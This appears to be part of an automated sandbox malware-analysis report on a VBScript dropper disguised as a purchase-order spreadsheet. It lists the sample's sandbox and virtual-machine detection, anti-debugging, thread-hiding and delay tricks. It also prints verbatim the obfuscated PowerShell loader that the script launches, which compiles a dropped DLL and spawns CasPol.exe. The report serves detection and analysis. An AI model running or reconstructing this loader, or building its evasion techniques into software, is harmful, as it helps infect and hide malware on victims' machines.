          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEG
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep count: 639 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep time: -319500s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9096Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 639Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C0006 sldt word ptr [eax]17_2_1F9C0006
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
          Source: wscript.exe, 00000000.00000003.761029190.0000016BB47B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000011.00000002.5818301150.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: PO-08784 xlsx.vbeBinary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeG
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000011.00000002.5826675755.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20456418 LdrInitializeThunk,17_2_20456418
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""tJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdlineJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
